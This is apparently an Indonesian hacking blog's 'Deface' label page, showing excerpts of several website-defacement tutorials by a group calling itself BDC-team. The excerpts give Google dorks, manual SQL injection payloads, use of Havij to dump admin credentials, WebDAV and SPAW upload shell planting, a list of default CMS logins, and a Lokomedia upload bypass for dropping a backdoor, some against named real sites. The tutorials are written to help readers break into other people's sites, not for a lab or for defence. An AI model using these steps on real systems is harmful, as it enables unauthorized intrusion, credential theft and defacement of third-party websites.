Skip to main content

Posts

Showing posts with the label Deface

Cara Deface Website dengan teknik SQL manual

-[BORNEO DEF ACER CREW]- 1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari  disini 2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu 3. Tambahkan karakter  '  pada akhir url'nya untuk mengetahui vulnerability'nya Contoh :  www.site.com/news.php?id=32' 4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface Contoh errornya :  warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line 5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter  +order+by+1--  di belakang url Contoh :  www.site.com/news.php?id=32+order+by+1-- Anda coba satu persatu hingga muncul tulisan error. Contoh :  www.site.com/news.php?id=32+order+by+2-- www.site.com/news.php?id=32+order...

Cara Deface Menggunakan Havij 1.16 Pro

Halo, Sobat BDC-Team.. Sebelumnya tutorial ini hanya untuk newbie jadi sebaiknya para master nyimak aja. Blogger BDC-team akan ngajarin agan Deface Menggunakan “Havij Pro 1.16″ Version dah Pro jadi abis Download tinggal pake. Okay dimulai ya. What will you Needs :     Havij Pro 1.16. Download : Havij Pro 1.16     Internet Connection     Target Setalah Download Havij kita bakal cara Target dulu, Targetnya seperti ini : http://www.boboho.com/interior-articles.php?id=5 dan website yg mau saya hack kali ini dengan nama Domain : boboho.com First : Click Analyze Nah, Sekarang kita udah dapet Databasenya “boboho_com” sekarang kita klik di button Tables. Click button Get Tables dan bakal keluar seperti ini : Pilih wp_users dan Click Button Get Columns. dan akan keluar sub database seperti ini : Nah, Sekarang kita udah dapet Password sama Username Admin. sekarang Cari URL Adminnya pake Admin Finder. Tinggal Masukin ID sama Password di URL Admin d...

Cara Deface Website Menggunakan SQL Injection Manual

hello SOB gmn kabarmu :D (sok kenal banget :)) kali ini BDC-team akan membagikan tutorial cara deface web menggunakan metode  SQL Injection MANUAL apa itu SQL INJECTION .? SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url Contoh : http://situsq.com/berita.php?id=14’ http://situsq.com/berita.php?id=’14 Apabila terlihat pesan error seperti ini : You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 Maka bisa dipastika...

Deface Website Dengan Metode Spaw Uploads

Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability. Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut  Cara Deface Website Melalui Spaw Uploads Vulnerability  Cekidot (^_^) 1).  Pertama, Masukan Dorknya : inurl:”spaw2/uploads/files/” Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan  site:th  pada akhir dork diatas. Jadi hasilnya begini : inurl:”spaw2/uploads/files/”  site:th Maksud dari site:th adalah domain negara asal website yang akan kita serang, " site:th " asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya  site:com.my ,  site:jp ,...

Deface Website Dengan Metode WEBDAV

Langsung aja yaah.. (^_^) Peralatan: Tool Webdav Hmei7 Via Ziddu     : Download Via 4Shared : Download Step: 1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'. 2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target. 3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav. 4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt 5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah ind...

Deface Website Dengan Metode Bug's CMS Balitbang

Oke sob, seperti biasa, langsung saja kita simak bersama (^_^). Dork in google.. 1. inurl:"/html/index.php" intext:"Tim Balitbang" 2. inurl:"/html/index.php" intitle:"Selamat Datang" 3. inurl:"/member/" intext:"Tim Balitbang" D in bing.. 1. IP:[target-IP] /html/ 2. IP:[target-IP] sch.id 3. IP:[target-IP] ac.id 4. IP:[target-IP] blablablaa… having fun! Dalam teknik ini, kita menggukan default pass member CMS Balitbang. USERNAME PASSWORD DETAILS SHELL UPLOAD alan 123456 guru available kickdody 123456 guru available siswanto 123456 guru available choirulyogya 123456 guru available wardjana 123456 guru available taufik 123456 guru available tomi 123456 ...

Deface Website Dengan Metode Bug's CMS Lokomedia

Oke langsung saja yaa sob (^_^)   Dork :  allinurl:media.php?module=berita Pilih suatu web yang menurut anda bisa di deface dengan lokomedia. http://www.target.com/admin/content.php?module=banner Langsung ganti url web target nya menjadi sperti berikut : http://www.target.com/admin/modul/mod_banner.php Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada : ./aksi.php?module=banner&act=input Kemudian ganti dengan http://www.target.com/admin/aksi.php?module=banner&act=input Simpan dengan Nama apa saja terserah anda kehendaki dengan format  .html , kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di : http://www.target.com/admin/foto_berita/shell.php Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami han...